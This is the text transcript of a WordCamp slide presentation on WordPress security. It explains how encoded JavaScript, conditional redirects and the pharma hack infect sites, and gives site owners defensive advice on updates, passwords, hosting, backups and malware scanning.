Why My Website Sells Viagra

Download Why My Website Sells Viagra

Post on 29-Jan-2015

107 views

Category:

Technology

0 download

Embed Size (px)

DESCRIPTION

WordPress End-User Security - WordCamp Atlanta - Dre Armeda, CISSP

TRANSCRIPT

<ul><li> 1. </li></ul> <p> 2. DRE ARMEDA,CISSP @ DREMEDA </p> <ul><li>CO-FOUNDER AT SUCURI SECURITY </li></ul> <ul><li>ORGANIZER, WORDCAMP SAN DIEGO </li></ul> <ul><li>12 YEAR NAVY VETERAN </li></ul> <ul><li>1 STWORDPRESS THEME IN 2005 </li></ul> <ul><li>LOVES TACOS </li></ul> <ul><li>DIEHARD CHARGERS FAN </li></ul> <ul><li>RIDES A HARLEY </li></ul> <p>SUCURI .NET DRE .IM 3. 4. THE WEB IS GROWING </p> <ul><li>Over 2 Billion internet users today. 480% growth in the last 11 years.(Internet World Stats) </li></ul> <ul><li>300 million websites were added to the internet in 2011(Pingdom) </li></ul> <ul><li>100,000+ domains gained weekly(Global Domain Registry) </li></ul> <p> 5. INNOVATION &amp; CREATIVITY 6. 7. 8. 9. 10. ITS NOT ALL PEACHY 11. 12. WHAT IS MALWARE? </p> <ul><li>SEO spam, JavaScript &amp; iFrame attacks, and malicious redirects are a couple web-based malware examples. </li></ul> <p>Malware, short for malicious software, is a software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems. 13. 14. ATTACKERS LOVE YOU </p> <ul><li>Monitor your web browsing and internet usage </li></ul> <ul><li>Forced advertising </li></ul> <ul><li>Redirect affiliate marketing revenue </li></ul> <p> 15. HOW BAD IS IT? </p> <ul><li>Over 2 million new malware strings monthly(McAfee) </li></ul> <ul><li>Cost to US consumers alone = over $2.3 billion in 2010.(Consumer Reports) </li></ul> <ul><li>Google Safe Browsing issues over 3 million malware warnings a day.(Google) </li></ul> <p> 16. 17. ENCODED JAVASCRIPT Impact:Website pages may be used to serve malicious downloads to visitors. Downloads may be used to infect desktop computers, and/or exploit FTP info.Typical Entry Point:Outdated, known vulnerable software; exploited desktop computers; exploited FTP credentials. JavaScript that is obfuscated(hidden) so that you cant tell what it is. It is injected into files/pages on the site and used to serve malware. 18. ENCODED JAVASCRIPT /wp-admin/js/cat.js CLEAN 19. ENCODED JAVASCRIPT /wp-admin/js/cat.js INFECTED 20. ENCODED JAVASCRIPT /wp-admin/js/cat.js INFECTION DECODED Somewhat 21. ENCODED JAVASCRIPT </p> <ul><li>Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes). Attack stems from exploited desktop which steals FTP information. </li></ul> <ul><li>Backdoor file inserted into the environment. Thisgives the attacker remote access into your world </li></ul> <ul><li>Payload inserted into various Javascript files and/or encoded and hidden in theme, plugin files. </li></ul> <ul><li>Youve just enabled your visitors to load fake anti-virus and other cool downloads from your site </li></ul> <p>How it works: 22. ENCODED JAVASCRIPT </p> <ul><li>Encoded JavaScript Resources: </li></ul> <ul><li>http://www.schillmania.com/content/entries/2009/javascript-malware-obfuscation- analysis </li></ul> <ul><li>http://www.slideshare.net/yusufmotiwala/reverse-engineering-malicious- javascript </li></ul> <ul><li>http://www.infosecisland.com/videos-view/19101-Malware-Analysis-How-to-Decode-JavaScript- Obfuscation.html </li></ul> <p>QUICK TIP:Check Google to see if youre infected -site:{yourdomain.com} viagra 23. CONDITIONAL REDIRECTS Impact:When traffic is coming from a specific referrer (i.e. Google, Bing), the site is redirected to a malicious website. Typical Entry Point:Outdated, known vulnerable software. An attack the causes a website to redirect to a malicious website based on referrer, web browser, operating system. 24. CONDITIONAL REDIRECTS Infected .htaccess file: 25. CONDITIONAL REDIRECTS Result of conditional redirect: 26. CONDITIONAL REDIRECTS </p> <ul><li>Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes).</li></ul> <ul><li>Backdoor file inserted into the environment. Thisgives the attacker remote access into your world </li></ul> <ul><li>.htaccess file entries are created to load redirected. Encoded redirect code can also be added to index files. </li></ul> <ul><li>Youre now redirecting to some cool malware awesomeness. </li></ul> <p>How it works: 27. CONDITIONAL REDIRECTS </p> <ul><li>Conditional Redirects Resources: </li></ul> <ul><li>http://blog.sucuri.net/2011/11/the-new-and-old-htaccess-attacks-now-using-in- domains.html </li></ul> <ul><li>http ://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess- malware.html </li></ul> <ul><li>http://sucuri.net/malware-update-timthumb-php-and-htaccess-redirection.html </li></ul> <p> 28. PHARMA HACK Impact:Website page and post titles, descriptions and links are changed to display pharmaceutical ads and links back to malicious websites on search engine result pages. Typical Entry Point:Outdated, known vulnerable software. Pharma Hack is a type of SEO poisoning. Attackers manipulate their search engine results to make their links appear higher than legitimate results. 29. PHARMA HACK Results of scanning rendered source.: 30. PHARMA HACK Google Search Engine Results: 31. PHARMA HACK </p> <ul><li>Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes) </li></ul> <ul><li>Backdoor file inserted into the environment. Thisgives the attacker remote access into your world </li></ul> <ul><li>Control file is inserted into core application or plugin files. This file acts as a connection from the backdoor to the database. </li></ul> <ul><li>Payload is dropped into the database and Viva Viagra! </li></ul> <p>How it works: QUICK TIP:Check Google to see if youre infected -site:{yourdomain.com} viagra 32. PHARMA HACK </p> <ul><li>Pharma Hack Resources: </li></ul> <ul><li>http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on- wordpress.html </li></ul> <ul><li>http://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma- hack.html </li></ul> <ul><li>http://www.pearsonified.com/2010/04/wordpress-pharma- hack.php </li></ul> <ul><li>http://wpdude.com/refreshing-google-index-after-pharma- hack </li></ul> <p>QUICK TIP:Check Google to see if youre infected -site:{yourdomain.com} viagra 33. 34. WHAT IS SECURITY? PROTECTING THINGS OF VALUE FROM HARMS WAY. 35. HOW &amp; WHY 36. AM I SECURE The percentage of risk can never be 0! The name of the game is minimizing risk. 37. 38. LOCAL MACHINE </p> <ul><li>Ensure your local machine stays updated </li></ul> <ul><li>Use an Anti-Virus solution &amp; enable auto-updates </li></ul> <ul><li><ul><li>Mac Sophos Anti-Virus for Mac Home Edition </li></ul></li></ul> <ul><li><ul><li>Windows - AVG Anti-Virus Free </li></ul></li></ul> <ul><li>Dont store server credentials on your local machine </li></ul> <p> 39. CONNECT TO YOUR SITE </p> <ul><li>Consider using sFTP or SSH instead of FTP. </li></ul> <ul><li>If youre stuck with FTP: </li></ul> <ul><li><ul><li><ul><li>Deny anonymous login </li></ul></li></ul></li></ul> <ul><li><ul><li><ul><li>Limit connections </li></ul></li></ul></li></ul> <ul><li>Practice least privilege </li></ul> <ul><li>Dont store server credentials on your local machine </li></ul> <p> 40. PASSWORDS </p> <ul><li>Change them often </li></ul> <ul><li>Dont write them down, or share them </li></ul> <ul><li>Passwords are like toothbrushes, you should keep them to yourself. And discard them, and get a new one, if they have been used by others. </li></ul> <ul><li>Dont use the same password across all your accounts </li></ul> <ul><li>Use a password manager </li></ul> <ul><li><ul><li><ul><li>KeePass Password Safe </li></ul></li></ul></li></ul> <ul><li><ul><li><ul><li>LastPass </li></ul></li></ul></li></ul> <ul><li><ul><li><ul><li>1Password </li></ul></li></ul></li></ul> <p> 41. WHO HOSTS YOU? </p> <ul><li>CHEAP DOES NOT ALWAYS MEAN BEST, OR SAFEST! </li></ul> <ul><li>DO YOUR RESEACH! </li></ul> <ul><li>What software are they running? How often do they update? </li></ul> <ul><li>How are server and support credentials stored &amp; who has access? Are they 1 in the same? </li></ul> <ul><li>What is their malware remediation process? </li></ul> <ul><li>How many sites have been infected? </li></ul> <ul><li>http://www.google.com/safebrowsing/diagnostic?site=google.com </li></ul> <p> 42. GARAGE CLEANING </p> <ul><li>IF YOURE NOT USING IT, REMOVE IT! </li></ul> <ul><li>UPDATE UPDATE UPDATE UPDATE UPDATE </li></ul> <ul><li>Only load whats needed to get your job done. </li></ul> <ul><li>Check your file and directory permissions. </li></ul> <ul><li>Remove user accounts! Practice least privilege. </li></ul> <ul><li>Have you changed your password lately? </li></ul> <ul><li>UPDATE UPDATE UPDATE UPDATE UPDATE </li></ul> <p> 43. 44. BACKUP YOUR WEBSITE </p> <ul><li>NO BACKUPS = BOOOOO! </li></ul> <ul><li>BackupBuddy -http:// pluginbuddy.com/ backupbuddy / </li></ul> <ul><li>VaultPress http://vaultpress.com </li></ul> <p> 45. MALWARE SCAN </p> <ul><li>IS YOUR SITE INFECTED? </li></ul> <ul><li>Unmask Parasites http://unmaskparasites.com </li></ul> <ul><li>Sucuri SiteCheck http://sitecheck.sucuri.net </li></ul> <p> 46. MALWARE CLEAN UP </p> <ul><li>IS YOUR SITE INFECTED? </li></ul> <ul><li>VaultPress http://vaultpress.com </li></ul> <ul><li>Sucuri Security http://sucuri.net </li></ul> <p> 47. WORDPRESS PLUGINS </p> <ul><li>WordPress Exploit Scanner </li></ul> <ul><li>BulletProof Security </li></ul> <ul><li>Login Lockdown </li></ul> <ul><li>Sucuri SiteCheck Malware Scanner </li></ul> <p> 48. </p>